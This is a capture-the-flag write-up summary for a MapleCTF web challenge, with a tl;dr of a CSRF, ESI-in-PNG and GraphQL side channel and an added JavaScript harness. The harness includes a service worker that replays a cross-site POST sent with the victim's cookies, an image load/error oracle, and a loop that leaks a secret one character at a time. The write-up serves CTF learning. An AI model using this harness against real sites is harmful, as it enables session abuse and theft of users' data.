Tags: csrf esi graphql varnish png web 

Rating:

[https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html](https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html)

tl;dr: Use CSRF to POST, with the victim's cookies, a PNG file that contains an ESI directive. The directive makes a GraphQL query that renders the PNG either valid or invalid depending on whether we guessed a letter of the flag correctly. We cache the response to that POST in a service worker, then load the same URL in an img tag and watch which of the onerror and onload handlers fires. The service worker is needed so that the img tag receives the POST's result instead of issuing a new GET request. See the [linked writeup](https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html) for details.
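The browser-side harness that the tl;dr describes, as an added example that is not code from the linked writeup or from the challenge: a service-worker fetch handler that caches the response to the cross-site POST and replays it for the following GET of the same URL, an img-based probe that turns onload/onerror into true/false, and the loop that recovers the flag one character at a time. The endpoint `TARGET_RENDER_URL`, the alphabet `FLAG_CHARSET` and the `buildProbeBody` hook are hypothetical placeholders; the PNG/ESI/GraphQL payload itself is challenge-specific and is deliberately not reproduced, so the caller supplies it.

```javascript
const TARGET_RENDER_URL = 'https://target.example/render'; // hypothetical endpoint
const FLAG_CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789_{}'; // assumed alphabet

// Service-worker side. Returns a 'fetch' event handler that forwards the
// cross-site POST upstream (the request carries the victim's cookies) and
// stores the response; the next GET for the same URL is answered from that
// store, so the <img> observes the POST's result instead of a fresh GET.
// `cache` is any Map-like store; `upstreamFetch` is normally the global fetch.
function makeFetchHandler(cache, upstreamFetch) {
  return (event) => {
    const { request } = event;
    if (request.url !== TARGET_RENDER_URL) return; // unrelated traffic passes through
    if (request.method === 'POST') {
      event.respondWith(
        upstreamFetch(request).then((resp) => {
          cache.set(request.url, resp.clone()); // keep a copy for the img load
          return resp;
        }),
      );
    } else if (request.method === 'GET' && cache.has(request.url)) {
      const cached = cache.get(request.url);
      cache.delete(request.url); // one-shot: every probe does its own POST first
      event.respondWith(Promise.resolve(cached));
    }
  };
}

// Install the handler only when this file actually runs inside a service worker.
if (typeof self !== 'undefined' && 'skipWaiting' in self) {
  self.addEventListener('fetch', makeFetchHandler(new Map(), fetch));
}

// Page side (browser only, not exercised by the test). buildProbeBody(prefix)
// must return the PNG-with-ESI payload for that guess (hypothetical hook).
async function imgProbe(buildProbeBody, prefix) {
  await fetch(TARGET_RENDER_URL, {
    method: 'POST',
    mode: 'no-cors',        // cross-site, so the response is opaque to the page
    credentials: 'include', // the CSRF part: send the victim's cookies
    body: buildProbeBody(prefix),
  });
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);   // PNG rendered: the guess was right
    img.onerror = () => resolve(false); // broken image: the guess was wrong
    img.src = TARGET_RENDER_URL;        // served by the worker from the cached POST
  });
}

// Drives the oracle one character at a time. probe(prefix) resolves to true
// iff the flag starts with prefix; the loop stops when no character in the
// charset extends the known prefix, or when maxLen is reached.
async function extractFlag(probe, charset = FLAG_CHARSET, maxLen = 64) {
  let known = '';
  while (known.length < maxLen) {
    let next = null;
    for (const c of charset) {
      if (await probe(known + c)) { next = c; break; }
    }
    if (next === null) break;
    known += next;
  }
  return known;
}
```

The handler deletes the cache entry after serving it so that each probe is paired with exactly one POST; without that, a stale response from an earlier guess would be replayed and the oracle would report the wrong bit. In a real run, `extractFlag` is called with `(p) => imgProbe(buildProbeBody, p)` from a page under the worker's scope.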

Original writeup (https://blog.bawolff.net/2023/10/ctf-writeup-jujutsu-kaisen-1-2-maplectf.html).